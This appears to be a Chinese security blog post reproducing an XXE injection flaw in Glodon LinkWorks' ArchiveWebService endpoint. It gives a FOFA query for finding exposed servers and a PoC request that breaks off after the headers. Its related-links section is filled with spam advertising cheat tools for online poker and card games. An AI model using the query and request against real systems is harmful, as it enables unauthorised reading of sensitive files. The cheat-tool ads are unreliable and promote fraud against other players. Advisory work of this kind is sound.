广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

透视透视挂"wepo... 透视透视挂"wepokerplus透视脚本免费"总结开挂作弊辅助软件(一向是真的有挂)相信很多朋友都...
重大来袭!赣牌圈小程序黑科技(... 重大来袭!赣牌圈小程序黑科技(辅助挂)AI教程(存在挂作弊开挂辅助下载)是一款可以让一直输的玩家,快...
八分钟了解!盛世透视辅助器,德... 八分钟了解!盛世透视辅助器,德普之星有透视辅助,揭秘教程(一直是有挂);1、不需要AI权限,帮助你快...
三次性普及“微信游戏决胜游戏辅... 三次性普及“微信游戏决胜游戏辅助”解密作弊开挂辅助工具(原来有挂);微信游戏决胜游戏辅助中的10万兆...
透视模拟器"wepo... 透视模拟器"wepoker免费透视"关于开挂作弊辅助方法(原来存在有挂);人气非常高,ai更新快且高...
每日必备!闲逸亲友圈下载辅助(... 每日必备!闲逸亲友圈下载辅助(辅助挂)靠谱教程(新版2026作弊开挂辅助器)是一款可以让一直输的玩家...
第七分钟了解!小程序辅助器免费... 【福星临门,好运相随】;第七分钟了解!小程序辅助器免费,线上德州的辅助器是有挂,实用技巧(原生有挂)...
8次性普及“开心泉州小程序有挂... 8次性普及“开心泉州小程序有挂”解密作弊开挂辅助神器(切实存在有挂);1、很好的开心泉州小程序有挂工...
透视辅助"德普之星辅... 透视辅助"德普之星辅助软件"详细开挂作弊辅助下载(一贯是有挂);德普之星辅助软件软件透明挂作为一款德...
一分钟了解!广东雀神智能插件免... 一分钟了解!广东雀神智能插件免费(辅助挂)2025新版教程(详细作弊开挂辅助器);是一款可以让一直输...